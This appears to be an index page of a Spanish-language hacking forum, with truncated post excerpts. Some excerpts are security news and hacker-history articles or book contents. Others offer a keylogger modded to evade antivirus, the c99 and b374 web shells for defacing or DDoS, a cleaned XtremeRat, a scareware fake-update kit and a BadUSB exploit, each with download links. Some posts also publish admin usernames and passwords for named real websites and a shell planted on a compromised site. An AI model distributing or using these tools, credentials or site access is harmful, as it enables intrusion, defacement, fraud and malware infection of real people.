Limpiando keylogger

Este keylogger es muy viejo pueden ver en la descripción del video  que se subió hace como 4 años lo he estado modeando y le quite la firma del Nod32 para mi sorpresa salieron varias firmas jeje. Descargar original: http://www.mediafire.com/download/cb7wdy39p6q59y4/Keylogger.zip Escaneado en  virustotal por que ya es antiguo  cuando un malware es nuevo y esta  limpio no se pasa por virustotal por distribuye muestras y a los dias seria detectado. https://www.virustotal.com/es/file/6770713ac4566984c60c2c3dda72cbc57368aa0f142bd47d57bc210b77f1947f/analysis/1419521794/ La...

Practical Cryptography Algorithms and Implementations Using C++

Código: Contents Preface ix Acknowledgments xi About the Editors xiii Contributors xvii Chapter 1 B asics of Security and Cryptography 1 AL-SAKIB KHAN PATHAN Chapter 2 C lassical Cryptographic Algorithms 11 SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD Chapter 3 R otor Machine 35 SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD Chapter 4 B lock Cipher 45 TANVEER AHMED, MOHAMMAD ABUL KASHEM, AND SAIFUL AZAD Chapter 5 D ata Encryption Standard 57 EZAZUL ISLAM AND SAIFUL AZAD Chapter 6 A dvanced Encryption Standard 91 ASIF UR RAHMAN, SAEF ULLAH MIAH, AND SAIFUL...

Malware que ataca sistemas de banca online

Una nueva e importante amenaza de malware dirigido a sistemas de banca en línea y a sus clientes ha sido detectada por los analistas de seguridad de Kaspersky Lab. Identificado como una evolución del Troyano Zeus, Trojan-Banker.Win32.Chthonic, o Chthonic para abreviar, se sabe que ha afectado a más de 150 bancos diferentes y 20 sistemas de pago en 15 países, y parece estar destinado principalmente a atacar a instituciones financieras en el Reino Unido, España, Estados Unidos, Rusia, Japón e Italia. Aunque Chthonic aún no ha sido detectado...

2 Shell Up

Les dejo dos shell  la c99shell 1.0 y b374 2.8  para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada. Descargar: http://www.mediafire.com/download/30kazg5grulrry1/shell+subida.rar ...

Login Admin Hackeado

Para subir shell no modifiquen nada -_- Web http://www.embroidered-printed-clothing.co.uk/ Login Admin http://www.embroidered-printed-clothing.co.uk/login.php Username: JustinPassword: jlcb599516 http://vecinitas.com.ve/admin/login.phpUsuario: luisContraseña: 12345 Thanks 12Glitc...

¿Quién es la “Barbie Hacker Feminista”?

Entre los miles de productos de Barbie que existen en este planeta está un libro ilustrado que lleva como título Barbie: I Can be a Computer Engineer (traducido es algo como Barbie: yo puedo ser una ingeniera en computación). Dicho libro ha recibido montones de críticas en Internet por tratarse de un contenido que –ante la percepción de muchos– utiliza el estereotipo de la forma en que las mujeres supuestamente entienden (o más bien no entienden) la industria tecnológica.En el libro, Barbie le pide ayuda a sus dos amigos hombres para arreglar...

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (IV)

Internet ha cambiado en los últimos veinte años, pero no tanto como podría parecer. Si miramos de cerca su código, cual Matrix, vemos que muchas cosas siguen siendo en esencia las mismas, sólo han mutado las herramientas: lo que antes era una BBS hoy sería, salvando las distancias, Facebook. Y Twitter, una mezcla de chat y lista de correo personalizada. En cuanto a las revistas electrónicas o 'ezines', tendrían la función que hoy tiene un blog. Y, así como no hay prácticamente colectivo en Internet que hoy no tenga su 'blog', tampoco en los...

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (III)

Imagine cómo aprendería usted algo que está sucediendo ahora mismo, para lo que no hay maestros ni medios de comunicación de masas que lo retransmitan, y cuyo conocimiento está sólo al alcance de una élite. Un importante paso, posiblemente, sería unirse a otros para ayudarse mutuamente. De esta manera cada uno o una podría especializarse en una cosa y enseñarla al resto. Lo siguiente sería crear las plataformas adecuadas para que cuanta más gente posible pudiese acceder al nuevo conocimiento. Esto sucedió en los años 90 del siglo pasado con las...

Shell gratis

Aquí les regalo esta web con shell para que suban sus shell booter o lo que quieran, si quieren pueden defacear xDAutor:12Glitch13 Deface web con shell http://www.lacoloniadigital.com.uy/noticias/12Glitch13.php Web original http://www.lacoloniadigital.com.u...

PERUHACK 2014

Expertos y ponentes del próximo evento PERUHACK 2014, en Lima, responden sobre los conocimientos y capacidades necesarios para ser denominado “hacker”. detalles técnicos.LAS EMPRESAS ESTÁN EN PELIGRO“No hay el conocimiento suficiente dentro de las personas en las organizaciones respecto a los problemas de seguridad (informática)”, señala Walter Cuestas, Gerente de Open Sec y experto en Hacking Ético. “Aunque la información es abundante con respecto a cómo se llevan a cabo los ataques (de hackers) no es algo que se difunda tanto”.“Si...

Proxy List 05.11.14 + Vip Socks 5

Un proxy es un programa o dispositivo que realiza una tarea acceso a Internet en lugar de otro ordenador. Un proxy es un punto intermedio entre un ordenador conectado a Internet y el servidor que está accediendo. Cuando navegamos a través de un proxy, nosotros en realidad no estamos accediendo directamente al servidor, sino que realizamos una solicitud sobre el proxy y es éste quien se conecta con el servidor que queremos acceder y nos devuelve el resultado de la solicitud. Descargar Proxy List http://www.mediafire.com/download/3k6g6vncf9o17gi/Proxy+List+05.11.14.rarDescargar...

Kali Linux Network Scanning Cookbook

Table of Contents Preface 1 Chapter 1: Getting Started 7 Configuring a security lab with VMware Player (Windows) 7 Configuring a security lab with VMware Fusion (Mac OS X) 13 Installing Ubuntu Server 16 Installing Metasploitable2 20 Installing Windows Server 22 Increasing the Windows attack surface 24 Installing Kali Linux 27 Configuring and using SSH 31 Installing Nessus on Kali Linux 35 Configuring Burp Suite on Kali Linux 39 Using text editors (VIM and Nano) 42 Chapter 2: Discovery Scanning 45 Using Scapy to perform layer 2 discovery 49 Using...

Kali Linux CTF Blueprints

Table of Contents Preface 1 Chapter 1: Microsoft Environments 7 Creating a vulnerable machine 8 Securing a machine 8 Creating a secure network 9 Basic requirements 9 Setting up a Linux network 9 Setting up a Windows network 9 Hosting vulnerabilities 10 Scenario 1 – warming Adobe ColdFusion 11 Setup 11 Variations 14 Scenario 2 – making a mess with MSSQL 15 Setup 15 Variations 19 Scenario 3 – trivializing TFTP 20 Vulnerabilities 21 Flag placement and design 22 Testing your flags 22 Making the flag too easy 23 Making your finding too hard 24 Alternate...

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (II)

Todo 'hacker' lleva encima una mochila hecha de cientos, miles de horas de estudio y lectura. Los libros son sus aliados, gruesos libros técnicos donde destaca, desde el principio, la editorial O'Reilly. Pero el mundo de la tecnología cambia tan rápido que el libro solo no puede alcanzarlo: ¿Cómo esperar a que se publique un libro para avisar de un agujero de seguridad, o de la aparición de una nueva versión de un programa? Aquí juegan un papel clave los foros y medios en línea, sean medios de comunicación al uso, blogs, redes sociales, páginas...

XtremeRat Limpio C#

Cita: RAT’s: aplicaciones de administración remota .Tienen varias funciones como keylogger, capturador de cam, etc. Su función básica es administrar remotamente un ordenador desde otro y poder ejecutar distintas acciones que trae consigo. Por esto esta Sucio :(  http://www.rpp.com.pe/2014-01-27-piratas-informaticos-atacan-el-ministerio-de-defensa-de-israel-noticia_664887.html http://www.v3.co.uk/v3-uk/news/2329614/hackers-dropping-zeus-in-favour-of-xtreme-rat http://www.eset.com.uy/threat-center/index.php?subaction=showfull&id=1354747280&archive=&start_from=&ucat=2&n=2 Descargar...

Exploit de Zero-day de Microsoft PowerPoint

Parece que no hay fin a las ventanas de cero días, como recientemente Microsoft parcheado tres vulnerabilidades de día cero en Windows, que fueron explotadas activamente en la naturaleza por los hackers, y ahora una nueva vulnerabilidad de día cero se ha revelado que afecta a todas las versiones compatibles del sistema operativo Windows, excepto en Windows Server 2003.  Microsoft ha publicado una revisión de seguridad temporal para la falla y también confirmó que la falla de día cero está siendo activamente explotada por los hackers a...

Adware

Nuevo modelo de update browser , auto detecta el navegador , funciona , google , ie , opera, firefox y safary Modelo actualizado de flash player and scareware obama.Remplasa el exe por tu exe / landing 0/60 Descargar: http://www.mediafire.com/download/h2w62h8a6vmtzqc/Adware.zip Thanks [?...

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (I)

No hay ser humano que no tenga un mínimo conocimiento. Pero en la comunidad 'hacker' el conocimiento es vital, materia prima, la sangre que corre por sus venas y razón de su existencia. En septiembre de 1997, la desaparecida revista 'Jumping' publicaba el que posiblemente sea primera reportaje sobre el fenómeno 'hacker' en España. Allí se destacaba, ya en las primeras líneas, esa búsqueda del Grial llamado conocimiento que es la base de la cultura 'hacker': "Los 'hackers', cuya máxima pretensión (en su estado puro) es conseguir toda la información...

Mastering kali linux for advanced penetration testing

Table of Contents [ ii ] Chapter 2: Identifying the Target – Passive Reconnaissance 43 Basic principles of reconnaissance 44 Open Source intelligence 45 DNS reconnaissance and route mapping 47 WHOIS 48 DNS reconnaissance 50 IPv4 51 IPv6 53 Mapping the route to the target 54 Obtaining user information 57 Gathering names and e-mail addresses 58 Profiling users for password lists 61 Summary 63 Chapter 3: Active Reconnaissance and Vulnerability Scanning 65 Stealth scanning strategies 66 Adjusting source IP stack and tool identification settings...

UFONet - DDoS

UFONet - es una herramienta diseñada para lanzar ataques DDoS contra un objetivo, utilizando vectores 'Open Redirect' de aplicaciones web de terceros, como botnet. Intrucciones: http://ufonet.sourceforge.net/ número de versión del programa de espectáculos --version y salida     v, --verbose verbose activa en las peticiones     --check-tor de verificación para ver si Tor se utiliza correctamente     cheque --update para la última versión estable     * Configure Request (s) *:   ...

BADusb Exploit Liberado

 ¿Qué es BAD USB ?  Badusb es creado por ingeniería inversa del dispositivo USB  y mediante la inserción de programas maliciosos en el firmware, por lo que cuando se utiliza un palo infectado su mal estado. Sus puertos USB se hackeado y también lo hará el teclado y el ratón. Algunos técnicos llaman a esto 'exploit del año'.  Este era privada y sólo se filtró en estos días.  pero todavía 0 días y FUD  Por favor, use con responsabilidad.  usted encontrará todas las instrucciones en la página...

Liberan el hack para infectar USB de manera indetectable

El malware aprovecha un error de hardware que no puede ser parchadoA finales de julio, los expertos en seguridad digital de SR Labs, Karsten Nohl y Jakob Lell, revelaron el descubrimiento de BadUSB, un defecto de diseño en el hardware de los dispositivos USB que permiten infectarlos con malware de manera indetectable. Los especialistas se negaron a publicar el código de su hallazgo por la imposibilidad de crear un parche, pero los investigadores independientes Adam Caudill y Brandon Wilson utilizaron ingeniería inversa para repetir los efectos...